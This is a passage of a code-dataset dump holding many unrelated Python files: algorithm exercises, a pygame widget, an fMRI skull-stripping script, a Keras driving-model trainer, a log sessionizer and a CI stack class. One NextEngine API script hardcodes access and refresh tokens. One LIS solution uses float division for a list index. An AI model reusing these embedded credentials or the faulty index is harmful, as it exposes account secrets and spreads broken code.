os.environ.get(\"DISCORD_BOT_SECRET\")\nclient.run(token)","sub_path":"alpha_centuari.py","file_name":"alpha_centuari.py","file_ext":"py","file_size_in_byte":4358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"308198193","text":"'''\n开一个栈,每次取栈顶元素top和读到的元素temp做比较,如果temp > top 则将temp入栈;如果temp < top则二分查找栈中的比temp大的第1个数,并用temp替换它。 最长序列长度即为栈的大小top。\n这也是很好理解的,对于x和y,如果x < y且Stack[y] < Stack[x],用Stack[x]替换Stack[y],此时的最长序列长度没有改变但序列Q的''潜力''增大了。\n\n举例:原序列为1,5,8,3,6,7\n栈为1,5,8,此时读到3,用3替换5,得到1,3,8; 再读6,用6替换8,得到1,3,6;再读7,得到最终栈为1,3,6,7。最长递增子序列为长度4。\n\n当出现1,5,8,2这种情况时,栈内最后的数是1,2,8不是正确的序列啊?难道错了?\n分析一下,我们可以看出,虽然有些时候这样得不到正确的序列了,但最后算出来的个数是没错的,为什么呢?\n想想,当temp>top时,总个数直接加1,这肯定没错;但当temp<top时呢? 这时temp肯定只是替换了栈里面的某一个元素,所以大小不变,就是说一个小于栈顶的元素加入时,总个数不变。这两种情况的分析可以看出,如果只求个数的话,这个算法比较高效。但如果要求打印出序列时,就只能用DP了。\n'''\n\nclass Solution:\n \"\"\"\n @param nums: An integer array\n @return: The length of LIS (longest increasing subsequence)\n \"\"\"\n def longestIncreasingSubsequence(self, nums):\n if nums is None or len(nums) == 0:\n return 0\n q = [nums[0]]\n for i in range(1, len(nums)):\n if nums[i] > q[-1]:\n q.append(nums[i])\n else:\n l, r = 0, len(q)-1\n while l <= r:\n m = l+(r-l)/2\n if nums[i] > q[m]:\n l = m + 1\n else:\n r = m - 1\n q[l] = nums[i]\n return len(q)\n\n'''\ndp[i] 表示到i的最长上升子序列\n'''\n\nclass Solution:\n \"\"\"\n @param nums: An integer array\n @return: The length of LIS (longest increasing subsequence)\n \"\"\"\n def longestIncreasingSubsequence(self, nums):\n if nums is None or len(nums) == 0:\n return 0\n dp = [1 for _ in range(len(nums))]\n for cur, val in enumerate(nums):\n for prev in range(cur):\n if nums[prev] < val:\n dp[cur] = max(dp[cur], dp[prev] + 1)\n return max(dp)","sub_path":"dp/76_longest_increasing_subsequence.py","file_name":"76_longest_increasing_subsequence.py","file_ext":"py","file_size_in_byte":2512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"321554305","text":"import pygame.font\n\nclass Button:\n def __init__(self, ai_game, msg):\n self.screen = ai_game.screen\n self.screen_rect = self.screen.get_rect()\n\n # setting up properties\n self.width, self.height = 320, 80\n self.button_color = (243,198,35)\n self.text_color = (16,55,92)\n self.font = pygame.font.Font(\"fonts/Gilroy-ExtraBold.otf\", 50)\n\n # button's rect object and centering\n self.rect = pygame.Rect(0, 0, self.width, self.height)\n self.rect.center = self.screen_rect.center\n\n # the button message\n self._prep_msg(msg)\n\n def _prep_msg(self, msg):\n # turn msg into a rendered image\n self.msg_image = self.font.render(msg, True, self.text_color, self.button_color)\n self.msg_image_rect = self.msg_image.get_rect()\n self.msg_image_rect.center = self.rect.center\n\n def draw_button(self):\n self.screen.fill(self.button_color, self.rect)\n self.screen.blit(self.msg_image, self.msg_image_rect)\n\n","sub_path":"button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"188279832","text":"def quick_sort(arr):\n\tif len(arr) <= 1:\n\t\treturn arr\n\tpivot = arr[len(arr)//2]\n\tdel arr[len(arr)//2]\n\tarr1, arr2 = [], []\n\tfor i in range(len(arr)):\n\t\tif arr[i] <= pivot:\n\t\t\tarr1.append(arr[i])\n\t\telse:\n\t\t\tarr2.append(arr[i])\n\treturn quick_sort(arr1) + [pivot] + quick_sort(arr2)\n\ndef main(input):\n\tarr = input.split(',')\n\tarr = [int(x) for x in arr]\n\tprint(quick_sort(arr))\n\nif __name__ == \"__main__\":\n\tmain(input())","sub_path":"quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"210454844","text":"import requests\nimport pandas\nimport json\nimport codecs\n\ntoken = pandas.read_csv('token.csv')\naccess_token = token['access_token'][0]\nrefresh_token = token['refresh_token'][0]\nendPoint = \"https://api.next-engine.org/api_v1_master_goods/upload\"\norderEndPorint = 'https://api.next-engine.org/api_v1_receiveorder_base/upload'\nNE_Result = 'https://api.next-engine.org/api_v1_system_que/search'\n\n\n#ProductUpload \n'''\ndata = open('stockUpdateCSV.csv')\n\nparamsJSON = {\n \"access_token\":\"90ed23ea1794c42a3ee2ff7e951d06d14a225f3ce4abc23f1690d9fdb665233e1fe1fdbbbab26add55bb2eb72eb502b6695f88ecd81a8acd2ac10f4a27e6fe52\",\n \"refresh_token\":\"d6c6a81f277aa7bfb97e145ca5dd5a4375bbc2691e2f19e3d09f1e2d3b8e851eaa88282a24f184d804e14b7707da492bc1ef66d9fb6a845ee96bd4e02b191d10\",\n \"wait_flag\":\"1\",\n \"data_type\":\"csv\",\n \"data\":data.read()\n }\n\nrequest = requests.post(endPoint, data=paramsJSON)\nresult = request.content\nresult_json = json.loads(result)\nprint(result_json)\n\n'''\n'''\n### OrderUpdate\n\ndata = codecs.open('sample.csv', 'r', 'shift_jis', 'ignore')\n\nparamsJSON = {\n \"access_token\":access_token,\n \"refresh_token\":refresh_token,\n \"wait_flag\":\"1\",\n \"receive_order_upload_pattern_id\":\"2\",\n \"data_type_1\":\"csv\",\n \"data_1\":data.read()\n }\n\nrequest = requests.post(orderEndPorint, data=paramsJSON)\nresult = request.content\nresult_json = json.loads(result)\nprint(result_json)\n\n'''\n\n## Query NE Job Result\nparamsJSON = {\n \"access_token\":access_token,\n \"refresh_token\":refresh_token,\n \"wait_flag\":\"1\",\n \"fields\":\"que_id,que_method_name,que_upload_name,que_status_id,que_message\",\n \"que_creation_date-gte\":\"2018-09-03\",\n \"limit\":\"3\"\n }\n\nrequest = requests.post(NE_Result, data=paramsJSON)\nresult = request.content\nresult_json = json.loads(result)\nprint(result_json)\n","sub_path":"FNS-NE/upTest.py","file_name":"upTest.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"192407400","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('roster', '0004_auto_20150901_1218'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='shiftslot',\n old_name='time_slot',\n new_name='shift_times',\n ),\n ]\n","sub_path":"roster/migrations/0005_auto_20150901_1220.py","file_name":"0005_auto_20150901_1220.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"164653495","text":"import csv\r\nimport cv2\r\nimport numpy as np\r\nimport random\r\nfrom preprocess import preprocess\r\nfrom pathlib import Path\r\nfrom sklearn.utils import shuffle\r\nimport sys\r\n\r\n_training_data_root = 'training_data'\r\n\r\n_cameras = { 0: 'center', 1: 'left', 2: 'right'}\r\n\r\n\r\ndef print_progress_bar (iteration, total, prefix = 'progress:', suffix = ' ', decimals = 1, length = 30, fill = '='):\r\n percent = (\"{0:.\" + str(decimals) + \"f}\").format(100 * (iteration / float(total)))\r\n filledLength = int(length * iteration // total)\r\n bar = fill * filledLength + '.' * (length - filledLength)\r\n print('\\r%s [%s] %s%% %s' % (prefix, bar, percent, suffix), end = '\\r')\r\n if iteration == total:\r\n print()\r\n\r\nclass TrainData:\r\n def __init__(self):\r\n self.images = [[],[],[]]\r\n self.camera = []\r\n self.steer = []\r\n self.throttle = []\r\n self.brake = []\r\n self.speed = []\r\n\r\n def append(self, images, steer, throttle, brake, speed):\r\n for i in range(len(self.images)):\r\n self.images[i].append(images[i])\r\n self.steer.append(steer)\r\n self.throttle.append(throttle)\r\n self.brake.append(brake)\r\n self.speed.append(speed)\r\n\r\n def print(self, i):\r\n print('----------------------')\r\n print('train data :', i)\r\n print(' steer :', self.steer[i])\r\n print(' throttle :', self.throttle[i])\r\n print(' brake :', self.brake[i])\r\n print(' speed :', self.speed[i])\r\n\r\n def get_train_data(self, camera):\r\n return (np.array(self.images[camera]),np.array(self.steer))\r\n\r\n def preprocess(self):\r\n num_images=sum(len(x) for x in self.images)\r\n print('preprocess images:',num_images)\r\n i=0\r\n print_progress_bar(i, num_images, prefix = 'preprocess:')\r\n for image_set_index in range(len(self.images)):\r\n for img_index in range(len(self.images[image_set_index])):\r\n self.images[image_set_index][img_index] = preprocess(self.images[image_set_index][img_index])\r\n i+=1\r\n if i%100==0:\r\n print_progress_bar(i, num_images, prefix = 'preprocess:')\r\n print_progress_bar(num_images, num_images, prefix = 'preprocess:')\r\n\r\n def get_all_train_data(self, side_steer=0.15):\r\n images = np.array(self.images[0]+self.images[1]+self.images[2]);\r\n steer = np.append(np.append(np.array(self.steer),\r\n np.zeros(len(self.steer))+side_steer),\r\n np.zeros(len(self.steer))-side_steer)\r\n print(images.shape)\r\n print(steer.shape)\r\n return (images, steer)\r\n\r\n def get_train_data_straight_augmented(self, correction=0.6, correction_range=0.01, side_correction=0.2):\r\n images = []\r\n steer = []\r\n center_steer_correction = correction\r\n print('.get train data steer augmented')\r\n print(' raw steer samples :',len(self.steer))\r\n n_zero_steer=0\r\n n_with_steer=0\r\n for i in range(len(self.steer)):\r\n if abs(self.steer[i])<0.001:\r\n n_zero_steer+=1\r\n c = correction\r\n if correction_range>0:\r\n c=random.uniform(correction-correction_range, correction+correction_range)\r\n images.append(self.images[1][i])\r\n steer.append(c)\r\n images.append(self.images[2][i])\r\n steer.append(-c)\r\n else:\r\n n_with_steer+=1\r\n images.append(self.images[0][i])\r\n steer.append(self.steer[i])\r\n images.append(np.fliplr(self.images[0][i]))\r\n steer.append(-self.steer[i])\r\n\r\n images.append(self.images[1][i])\r\n steer.append(min(1,self.steer[i]+side_correction))\r\n images.append(self.images[2][i])\r\n steer.append(max(-1,self.steer[i]-side_correction))\r\n images.append(np.fliplr(self.images[1][i]))\r\n steer.append(-(min(1,self.steer[i]+side_correction)))\r\n images.append(np.fliplr(self.images[2][i]))\r\n steer.append(-(max(-1,self.steer[i]-side_correction)))\r\n\r\n print(' no steer samples :',n_zero_steer)\r\n print(' with steer samples :',n_with_steer)\r\n print(' augmented samples :',len(steer))\r\n return(np.array(images), np.array(steer))\r\n\r\n def pickle(self):\r\n import pickle\r\n pickle.dump(self.images, open('images.p', 'wb'))\r\n pickle.dump(self.steer, open('steer.p', 'wb'))\r\n\r\n def unpickle(self):\r\n import pickle\r\n self.images = pickle.load(open('images.p', 'rb'))\r\n self.steer = pickle.load(open('steer.p', 'rb'))\r\n\r\ndef get_csv_len(csv_filename):\r\n with open(csv_filename, 'r') as f:\r\n reader = csv.reader(f)\r\n data = list(reader)\r\n row_count = len(data)\r\n return(row_count)\r\n\r\ndef get_csv_filename(folder, force_marked=False):\r\n marked_file = Path('{}/{}/driving_log_marked.csv'.format(_training_data_root, folder))\r\n if force_marked or marked_file.is_file():\r\n return(str(marked_file))\r\n return '{}/{}/driving_log.csv'.format(_training_data_root, folder)\r\n\r\ndef read_train_data_folder(train_data, folder, min_speed=1):\r\n print('.read train data folder:',folder)\r\n csv_filename = get_csv_filename(folder)\r\n print('.drive log:',csv_filename)\r\n csv_len = get_csv_len(csv_filename)\r\n print('.csv length:', csv_len)\r\n i=0\r\n print_progress_bar(i, csv_len, prefix = 'read {}:'.format(folder))\r\n with open(csv_filename, 'r') as csvfile:\r\n reader = csv.reader(csvfile)\r\n for line in reader:\r\n try:\r\n speed = float(line[3])\r\n except:\r\n continue\r\n if float(line[6])<min_speed:\r\n continue\r\n marked = True\r\n if (len(line)>7):\r\n marked = not line[7]=='False'\r\n if not marked:\r\n continue\r\n images = []\r\n for image_name in line[:3]:\r\n image_name = image_name.split('\\\\')[-1]\r\n image_file = '{}/{}/IMG/{}'.format(_training_data_root, folder, image_name)\r\n image = cv2.imread(image_file)\r\n images.append(image)\r\n train_data.append(images, float(line[3]), float(line[4]), float(line[5]), float(line[6]))\r\n i += 1\r\n if i%100==0:\r\n print_progress_bar(i, csv_len, prefix = 'read {}:'.format(folder))\r\n print_progress_bar(csv_len, csv_len, prefix = 'read {}:'.format(folder))\r\n\r\ndef read_train_data(train_data, folders):\r\n for folder in folders:\r\n read_train_data_folder(train_data, folder)\r\n\r\ntrain_data = TrainData()\r\n\r\n_reload_data = True\r\n\r\nif _reload_data:\r\n read_train_data(train_data,['j1','j2','j3','j5','j6','j8','j9'])\r\n read_train_data(train_data,['k1','k2','k3'])\r\n read_train_data(train_data,['k4','k5','j4','j7']) # shade turn\r\n read_train_data(train_data,['k6','k7','k8','k9']) # downhill right\r\n read_train_data(train_data,['l1','l2', 'l3']) # downhill right\r\n\r\n train_data.preprocess()\r\n train_data.pickle()\r\nelse:\r\n train_data.unpickle()\r\n\r\n\r\nX_train, y_train = train_data.get_train_data_straight_augmented(correction=0.065, correction_range=0.005)\r\n\r\n\r\nprint('X_train shape:',X_train.shape)\r\nprint('y_train shape:',y_train.shape)\r\nprint('X_train image shape:',X_train[0].shape)\r\n\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Flatten, Dense, Lambda, Cropping2D, Convolution2D, Dropout, MaxPooling2D\r\nfrom keras import regularizers\r\n\r\n_dropout=0.2\r\n\r\nmodel = Sequential()\r\nmodel.add(Convolution2D(8, (5, 5), activation='elu', padding='same', input_shape=X_train.shape[1:]))\r\nmodel.add(MaxPooling2D())\r\nmodel.add(Dropout(_dropout))\r\nmodel.add(Convolution2D(16, (3, 3), activation='elu', padding='same'))\r\nmodel.add(MaxPooling2D())\r\nmodel.add(Dropout(_dropout))\r\nmodel.add(Convolution2D(32, (3, 3), activation='elu', padding='same'))\r\nmodel.add(MaxPooling2D())\r\nmodel.add(Dropout(_dropout))\r\nmodel.add(Convolution2D(64, (3, 3), activation='elu', padding='same'))\r\nmodel.add(MaxPooling2D())\r\nmodel.add(Dropout(_dropout))\r\n\r\nmodel.add(Flatten())\r\nmodel.add(Dense(1000))\r\nmodel.add(Dense(100))\r\nmodel.add(Dense(50))\r\nmodel.add(Dense(10))\r\nmodel.add(Dense(1))\r\n\r\nmodel.compile(loss='mse', optimizer='adam')\r\n\r\nprint(model.summary())\r\n\r\nfor i in range(48):\r\n print('.epoch:',i+1)\r\n X_train, y_train = shuffle(X_train, y_train)\r\n model.fit(X_train, y_train, validation_split=0.2, shuffle=False, epochs=1)\r\n if i>25:\r\n model.save('model.{:02d}.h5'.format(i))\r\n\r\nmodel.save('model.h5')\r\n\r\n\r\n","sub_path":"CarND-Behavioral-Cloning-P3-Submission/track2/clone.py","file_name":"clone.py","file_ext":"py","file_size_in_byte":8763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"287231393","text":"## Sessionization.py for Edgar-Analytics-Master challenge\r\nimport os\r\nimport csv\r\nfrom datetime import datetime, timedelta\r\ndatetime_format = \"%Y-%m-%d %H:%M:%S\"\r\n\r\n## data formate initialization\r\ndata =[] #a list to store info from each row in log.csv file\r\ndict = {} #dicionary to use IP as key, and other info as its values.\r\nresult = [] #list to store final results\r\nnew_list = [] #list to store the processed log record.\r\n\r\n\r\n## path setting for data reading and result output\r\ncur_path = os.getcwd() #get current working directionary path\r\nfile_path1 = os.path.join(cur_path, \"input\", \"inactivity_period.txt\")\r\nfile_path2 = os.path.join(cur_path, \"input\", \"log.csv\")\r\nfile_path3 = os.path.join(cur_path, \"output\", \"sessionization.txt\")\r\n\r\n## read in inactive period value from inactivity_period.txt file\r\nf1 = open(file_path1,'r')\r\ninactivity_period = int(f1.readline())\r\n\r\n## read in raw data from log.csv file\r\nf2 = open(file_path2,'r')\r\nrawdata = csv.reader(f2)\r\n\r\n## Remove the empty line in log.csv\r\nfor row in rawdata:\r\n if row != []:\r\n data.append(row) #data is a list data structure\r\n\r\n## read log entry from line2 (index 1), and scan through each line of log\r\nfor i in range(1,len(data)):\r\n row = data[i]\r\n key = row[0] #key = IP address\r\n timestamp = datetime.strptime(row[1] + ' ' + row[2], datetime_format)\r\n\r\n ## check if the IP is a new record or has already exit in dict key\r\n if key not in dict.keys():\r\n ## key values in order: 0:st-time,1:ed-time, 2:filename, 3:file type, 4:access time,\r\n ## 5:number of file accessed, 6:time diff= save as zero for now\r\n dict[key] = [timestamp,timestamp,row[5],row[6],1,1,0]\r\n\r\n else:\r\n ## if the IP already exists in curr_dict key\r\n ## chech if it passes the inactivity_period since last visit\r\n diff = timestamp - dict[key][1] #### diff = current timestamp - last time visited\r\n access_time = diff.seconds\r\n\r\n ## if this acess is within the inactivity_period, then update the existing record in dict\r\n if access_time <= inactivity_period:\r\n dict[key][0] = dict[key][0] #first request time #####\r\n dict[key][1] = timestamp #last request time\r\n\r\n # update time elapsed : diff = last request time - first request time\r\n dict[key][4] += access_time\r\n\r\n # Update the file accessed and the number of file accessed\r\n dict[key][2] = row[5]\r\n dict[key][3] = row[6]\r\n # update the number of file accessed\r\n dict[key][5] += 1\r\n # time diff, save as zero for now\r\n dict[key][6] = 0\r\n\r\n ## if this visit has pasted the inactivity peropd, then append the exisiting record to new_list,\r\n ## then create a new IP entry in dict\r\n else:\r\n new_list.append([key,dict[key]])\r\n dict[key] = [timestamp,timestamp,row[5],row[6],1,1,0]\r\n\r\n# scan thru all key-value pair from dict to new_list\r\nfor key in dict.keys():\r\n new_list.append([key,dict[key]])\r\n\r\n## create two list to store records passed inactivity_period\r\n## and record have not passed the inactivity_period.\r\nres_list1 = [] # for records passed inactivity_period\r\nres_list2 = [] # for records have not passed inactivity_period\r\n\r\n## scan thru the new_list, to calculate the delta time = current_timestamp - first access time\r\n## then ass this delta to the end of new_list\r\nfor item in new_list:\r\n delta = (timestamp-item[1][1]).seconds\r\n item[1][6] = delta\r\n\r\n ## determine if the record passed the inactivity_period or not\r\n ## if passed, store in res_list1, if not passed, store in res_list2\r\n if delta > inactivity_period:\r\n res_list1.append([item[0],item[1][0],item[1][1],item[1][4],item[1][5],item[1][6]])\r\n else: #delta <= inactivity_period\r\n res_list2.append([item[0],item[1][0],item[1][1],item[1][4],item[1][5],item[1][6]])\r\n\r\nfrom operator import itemgetter\r\n## order res_list1 by descending of delta time\r\nres_list1 = sorted(res_list1,key=itemgetter(5),reverse=True)\r\n## order res_list2 by st_time and ed_time\r\nres_list2 = sorted(res_list2,key=itemgetter(1,2))\r\n\r\n## combine the two soreted list as final result list\r\nfor item in (res_list1 + res_list2):\r\n result.append(item[:5])\r\n\r\n## write result to sessionization.txt\r\nimport datetime\r\nformat11 = '%Y-%m-%d %H:%M:%S'\r\n\r\nf3 = open(file_path3,'w')\r\nwith f3 as f:\r\n for item in result:\r\n item[1] = item[1].strftime(format11)\r\n item[2] = item[2].strftime(format11)\r\n wr = csv.writer(f,lineterminator='\\n')\r\n wr.writerows(result)\r\nf3.close()\r\n","sub_path":"src/sessionization.py","file_name":"sessionization.py","file_ext":"py","file_size_in_byte":4617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"83645280","text":"class Solution(object):\n\n def maxSubArray(self, nums):\n \"\"\"\n Given an integer array nums, find the contiguous subarray (containing at least one number) which has the largest\n sum and return its sum.\n\n Runtime: 72 ms, faster than 92.49% of Python3 online submissions for Maximum Subarray.\n Memory Usage: 14.7 MB, less than 5.69% of Python3 online submissions for Maximum Subarray.\n\n\n Parameters\n ----------\n nums : list\n\n\n Returns\n -------\n ret : int\n\n\n Examples\n --------\n >>> Solution().maxSubArray([-2, 1, -3, 4, -1, 2, 1, -5, 4])\n 6\n\n \"\"\"\n\n mem = [0] * len(nums)\n for idx, val in enumerate(nums):\n try:\n mem[idx] = max(val, val + mem[idx - 1])\n except IndexError:\n mem[idx] = val\n # print(mem)\n return max(mem)\n\n","sub_path":"algorithms/53_Maximum_Subarray.py","file_name":"53_Maximum_Subarray.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"475593744","text":"#s1 = 'SPAM' s2 = 'SCAM'\n#Ecrire une fonctions qui retourne une liste contenant les carateres communs a ces 2 listes\n\ns1 = 'SPAM'\ns2 = 'SCAM'\n\ndef Comparator(x,y):\n\n list1 = list(x)\n list2 = list(y)\n listout = []\n\n for a in range(len(list1)):\n\n for b in range(len(list2)):\n if list1[a] == list2[b]:\n listout.append(list1[a])\n return print(listout)\n\nComparator(s1,s2)\n","sub_path":"Comp_OT.py","file_name":"Comp_OT.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"175105562","text":"import os\nimport numpy as np\nimport nibabel as nib\nimport matplotlib.pyplot as plt\nimport nipype.interfaces.fsl as fsl # importing FSL interface functions\n\n# Directory where your data set resides. This needs to be customized\ndataDir = '/home/satoru/Teaching/fMRI_Fall_2018/Data/ds102'\n\n# creating an object for BET process\nmybet = fsl.BET()\n\n# an T1 weighted image from one of the subjects\nimageT1 = os.path.join(dataDir,'sub-26/anat/sub-26_T1w.nii.gz')\n\n# output image file name\nimageT1Out = os.path.join(dataDir,'sub-26/anat/sub-26_T1w_brain.nii.gz')\n\n# specifying the input and output file names in the BET object\nmybet.inputs.in_file = imageT1\nmybet.inputs.out_file = imageT1Out\n\n# running BET\nmybet.run()\n\n\n\n\n# Importing custom functions for displaying sections\nimport sys\nsys.path.append('functions')\nfrom DisplaySection import show_section, load_nii_data\n\n# loading the data matrices\nX = load_nii_data(imageT1)\nXbet = load_nii_data(imageT1Out)\n\n# showing the before and after images\nplt.subplot(121)\nshow_section(X, 'xy', 140)\nplt.title('Original')\nplt.subplot(122)\nshow_section(Xbet, 'xy', 140)\nplt.title('After BET')\nplt.show()\n\n\n\n# playing with thresholds, then the output file\n# first, threshold = 0.2\nimageT1Out02 = os.path.join(dataDir,'sub-26/anat/sub-26_T1w_brain_f02.nii.gz')\nmybet.inputs.frac = 0.2 # here, actually specifying the threshold\nmybet.inputs.out_file = imageT1Out02\nmybet.run()\n\n# second, threshold = 0.8\nimageT1Out08 = os.path.join(dataDir,'sub-26/anat/sub-26_T1w_brain_f08.nii.gz')\nmybet.inputs.frac = 0.8 # here, actually specifying the threshold\nmybet.inputs.out_file = imageT1Out08\nmybet.run()\n\n\n# showing the skull stripping with various parameters\nplt.figure(figsize=[10,2.5])\n# loading the data matrices\nX = load_nii_data(imageT1)\nXbet02 = load_nii_data(imageT1Out02)\nXbet = load_nii_data(imageT1Out)\nXbet08 = load_nii_data(imageT1Out08)\n\n# showing the before and after images\nplt.subplot(141)\nshow_section(X, 'xy', 140)\nplt.title('Original')\nplt.subplot(142)\nshow_section(Xbet02, 'xy', 140)\nplt.title('Threshold 0.2')\nplt.subplot(143)\nshow_section(Xbet, 'xy', 140)\nplt.title('Threshold 0.5 (default)')\nplt.subplot(144)\nshow_section(Xbet08, 'xy', 140)\nplt.title('Threshold 0.8')\nplt.show()\n\n\n\n\n\n\n","sub_path":"Norm/SkullStrip_fsl.py","file_name":"SkullStrip_fsl.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"381978683","text":"class Main(newSchedStack):\n\n def __init__(self,stackargs):\n\n newSchedStack.__init__(self,stackargs)\n\n self.parse.add_required(key=\"repo_url\")\n self.parse.add_required(key=\"docker_repo\")\n\n self.parse.add_required(key=\"repo_branch\",default=\"dev\")\n self.parse.add_required(key=\"docker_host\",default=\"null\")\n\n # repo_key_group should automatically added if the \"category\" for the stack is \"build\"\n self.parse.add_required(key=\"repo_key_group\")\n\n self.parse.add_optional(key=\"aws_default_region\",default=\"us-east-1\")\n self.parse.add_optional(key=\"docker_tag_method\",default=\"commit_hash\")\n self.parse.add_optional(key=\"config_env\",default=\"private\")\n self.parse.add_optional(key=\"dockerfile\",default=\"Dockerfile\") # dockerfile to do build\n self.parse.add_optional(key=\"dockerfile_test\",default=\"null\") # dockerfile to do unit-test\n\n # this is actually a placeholder to provided consistency. \n # part of the saas, but will create an alternative stack\n # that separates more cleanly from saas\n self.parse.add_optional(key=\"triggered_branches\",default=\"dev\") \n\n # substacks can be referenced as fqn with <username>:::<repo>::<stack_name>\n # or <username>:::<stack_name> since stacks are first class citizens\n self.stack.add_substack(\"elasticdev:::ed_core::run_commit_info\")\n self.stack.add_substack(\"elasticdev:::docker::ec2_standby_ci\")\n self.stack.add_substack(\"elasticdev:::docker::docker_build\")\n self.stack.add_substack(\"elasticdev:::ed_core::empty_stack\")\n self.stack.add_substack('elasticdev:::ec2_server_stop')\n\n self.stack.init_substacks()\n\n def run_test(self):\n\n self.parse.add_required(key=\"repo_url\")\n self.init_variables()\n\n # Set docker host accordingly\n if not self.docker_host:\n self.docker_host = self.stackargs[\"docker_host\"] = \"{}-docker_host\".format(self.stack.cluster) \n\n # If not test scripts, we just return and skip unit_tests\n if not self.dockerfile_test:\n\n inputargs = {\"default_values\":{}}\n inputargs[\"automation_phase\"] = \"continuous_delivery\"\n\n description = 'No (uni-)tests to run'\n inputargs[\"human_description\"] = description\n inputargs[\"default_values\"][\"human_description\"] = description\n\n inputargs[\"display_hash\"] = self.stack.get_hash_object(inputargs)\n\n return self.stack.empty_stack.insert(display=True,**inputargs)\n \n # This sets the commit info need to register the image\n # we don't put this in the parsing arguments requested \n # since it is retrieved from the \"run\"\n self.set_commit_info()\n \n default_values = {\"commit_hash\":self.commit_hash}\n default_values[\"config_env\"] = self.config_env\n default_values[\"branch\"] = self.repo_branch\n default_values[\"repo_branch\"] = self.repo_branch\n default_values[\"repo_url\"] = self.repo_url\n default_values[\"repo_key_group\"] = self.repo_key_group\n\n if hasattr(self,\"commit_info\"): \n default_values[\"commit_info\"] = self.commit_info\n \n # revisit 34098732086501259\n # currently, we placed the dockerfile right into\n # run variables. in the future, we may want to \n # separate this dockerfile (test) from dockerfile (build)\n # not urgent right now, in this instance, they run in order\n # from unit_test (dockerfile_test) to build (dockerfile)\n overide_values = {\"docker_host\":self.docker_host}\n overide_values[\"dockerfile\"] = self.dockerfile_test\n \n inputargs = {\"default_values\":default_values,\n \"overide_values\":overide_values}\n \n inputargs[\"automation_phase\"] = \"continuous_delivery\"\n inputargs[\"human_description\"] = 'Performing unit test with Dockerfile\"{}\"'.format(self.dockerfile_test)\n \n return self.stack.docker_build.insert(display=True,**inputargs)\n\n def run_record(self):\n\n # init is set by the saas automatically \n # when run for the first time\n self.parse.add_optional(key=\"init\",default=\"null\")\n self.parse.add_optional(key=\"commit_info\",default=\"null\")\n self.parse.add_optional(key=\"commit_hash\",default=\"null\")\n self.init_variables()\n\n if not self.commit_info and not self.init:\n msg = \"you need commit_info unless this is the first code retrieval\"\n self.stack.ehandle.NeedRtInput(message=msg)\n\n inputargs = {\"automation_phase\":\"continuous_delivery\"}\n inputargs[\"human_description\"] = 'Publish commit_info'\n inputargs[\"default_values\"] = {\"commit_info\":self.commit_info}\n return self.stack.run_commit_info.insert(display=True,**inputargs)\n\n def run_stop_vm(self):\n\n self.init_variables()\n\n # Set docker host accordingly\n if not self.docker_host:\n self.docker_host = self.stackargs[\"docker_host\"] = \"{}-docker_host\".format(self.stack.cluster) \n\n default_values = {\"hostname\":self.docker_host}\n inputargs = {\"default_values\":default_values}\n inputargs[\"automation_phase\"] = \"continuous_delivery\"\n inputargs[\"human_description\"] = 'Stopping docker_host \"{}\"'.format(self.docker_host)\n\n return self.stack.ec2_server_stop.insert(display=True,**inputargs)\n\n def run_build(self):\n\n self.parse.add_required(key=\"repo_url\")\n self.init_variables()\n\n # Set docker host accordingly\n if not self.docker_host:\n self.docker_host = self.stackargs[\"docker_host\"] = \"{}-docker_host\".format(self.stack.cluster) \n\n # This sets the commit info need to register the image\n # we don't put this in the parsing arguments requested \n # since it is retrieved from the \"run\"\n self.set_commit_info()\n\n default_values = {\"docker_repo\":self.docker_repo}\n default_values[\"repo_key_group\"] = self.repo_key_group\n # We use the abbrev commit hash with 7 characters\n default_values[\"tag\"] = self.commit_hash[0:6]\n default_values[\"config_env\"] = self.config_env\n default_values[\"branch\"] = self.repo_branch\n default_values[\"repo_branch\"] = self.repo_branch\n default_values[\"repo_url\"] = self.repo_url\n default_values[\"commit_hash\"] = self.commit_hash\n default_values[\"docker_repo\"] = self.docker_repo\n default_values[\"aws_default_region\"] = self.aws_default_region\n\n if hasattr(self,\"commit_info\"): \n default_values[\"commit_info\"] = self.commit_info\n\n # do we need to overide here?\n overide_values = {\"docker_host\":self.docker_host}\n overide_values[\"dockerfile\"] = self.dockerfile\n\n inputargs = {\"default_values\":default_values,\n \"overide_values\":overide_values}\n\n inputargs[\"automation_phase\"] = \"continuous_delivery\"\n inputargs[\"human_description\"] = 'Building docker container for commit_hash \"{}\"'.format(self.commit_hash)\n\n return self.stack.ec2_standby_ci.insert(display=True,**inputargs)\n\n def run(self):\n \n self.stack.unset_parallel()\n self.add_job(\"test\",instance_name=\"auto\")\n self.add_job(\"record\",instance_name=\"auto\")\n self.add_job(\"build\",instance_name=\"auto\")\n self.add_job(\"stop_vm\",instance_name=\"auto\")\n\n return self.finalize_jobs()\n\n def schedule(self):\n\n sched = self.new_schedule()\n sched.job = \"record\"\n sched.archive.timeout = 600\n sched.archive.timewait = 120\n sched.archive.cleanup.instance = 